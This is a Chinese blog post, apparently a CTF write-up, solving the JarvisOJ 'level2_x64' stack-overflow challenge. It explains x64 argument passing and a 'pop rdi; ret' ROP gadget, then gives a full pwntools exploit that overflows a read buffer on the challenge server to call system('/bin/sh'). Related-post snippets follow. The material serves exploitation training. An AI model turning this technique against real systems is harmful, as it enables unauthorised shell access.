JarvisOJ level2x64

最新推荐文章于 2024-07-05 00:58:41 发布
最新推荐文章于 2024-07-05 00:58:41 发布
阅读量531 收藏 7
点赞数 3
文章标签: pwn 栈溢出 ROP x64
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95185274
版权

这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的

前言:

首先,我们先看一下x64和x86的区别:

linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。
——引自于蒸米大神的一步一步学ROP
蒸米大神解释的十分通透,对于这一题,我们知道system函数只有一个参数,也就是说,这个参数应该是保存在RDI中,而不会保存到栈上面,不然的话就是第7个参数了,但是我们在进行栈溢出的时候,并不能直接写到寄存器中去。这里,我们就必须用到一些其他的方法。

使用gadget控制RDI等寄存器

所谓gadget,通俗来讲就是程序中的一些小指令,因为我们在一个程序中,不一定能找到刚好符合我们想法一大段的指令(就像system函数和/bin/sh不会每次都以system(’/bin/sh’)出现给你直接使用),我们就只能找一些零碎的片段,再组合起来慢慢使用。
关于寻找gadget的方法,建议看蒸米大神的《一步一步学ROP之linux_x64篇》
在这里,我就使用其中的一种方法寻找gadget。

拿到题目,首先我们还是查看一下保护:
在这里插入图片描述
程序只开启了NX保护,这里和level2差不多。
打开IDA,我们看一下程序的逻辑:
在这里插入图片描述
我们可以看到在vul()函数中有一个read函数存在栈溢出漏洞。
看了一下,程序基本和level2相似,我们就直接构造payload,因为这里使x64的程序,所以我们构造payload应该这样:
在这里插入图片描述
我们使用pop_ret将我们写到栈中的参数放到RDI中(大佬们称此为平衡栈帧)。
接下来我们只要找到一个pop rdi;ret 就可以了。
这里,我们使用ROPgadget寻找这个指令片段:
在这里插入图片描述
程序中正好有我们想要的pop rdi ; ret 片段,我们直接利用起来构造payload就行了。完整的exp如下:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9882)
p.recvuntil('Input:')
system_addr=0x04004c0
pop_addr=0x04006b3
sh_addr=0x0600a90
payload='a'*0x80+'a'*8+p64(pop_addr)+p64(sh_addr)+p64(system_addr)+'a'*8
p.sendline(payload)
p.interactive()

运行结果如下:
在这里插入图片描述

PLpa、
关注
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1442
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
jarvisoj_level2_x64
m0_52231248的博客
11-15 528
jarvisoj_level2_x64 Checksec: Ida: 很容易找到溢出点,offest=0x88,程序有system的plt地址,搜索bin_sh字段 构造exp: Flag;
jarvis oj level2_x64
发蝴蝶和大脑斧的博客
12-05 540
接下来做64位了,首先看下和32位有什么不一样。这篇文章的第3节说的很详细 主要来说就是: 1.内存地址的范围由32位变成了64位,但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。 2.x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。我们要修改寄存器的值就得通过找到例如pop rdi;ret这样...
【BUUCTF-PWN】13-jarvisoj_level2_x64
最新发布
燕麦葡萄干的博客
07-05 416
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1432
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
Jarvis OJ level1
Kni9hT's Blog
11-08 593
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 482
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 943
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
jarvisoj_level2
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
BUUCTF jarvisoj_level2_x64
小白垃圾笔记2
05-12 300
因为有栈对齐所以需要ret,因为是64位传参所以需要pop rdi。system函数的地址也可以看。小白做题笔记,不建议阅读。我们尝试找下bin/sh。函数直接调用漏洞函数。
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 374
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
jarvis oj---level2x64
weixin_45427676的博客
09-29 331
题目来源 nc pwn2.jarvisoj.com 9882 level2_x64.04d700633c6dc26afc6a1e7e9df8c94e 解题 x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86...
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1149
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
jarvisoj_level2_x64[BUUCTF]
moonlightsunshin的博客
05-04 372
32位中参数都是保存在栈上,但在64位中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成 无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,
jarvis oj level2-x64
CNXBDSa的博客
07-27 401
栈溢出大佬总结详情 好了说说做这题的过程 思路和个人见解吧 首先明白32位和64之间的传参的差距 32位通过栈来进行传参 64位是通过寄存器来传参 -----函数参数的传递方式发生了改变,x86(32位)中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,如果还有更多的参数的话才会保存在栈上。 第一步我们还是checksec查看...
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 457
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值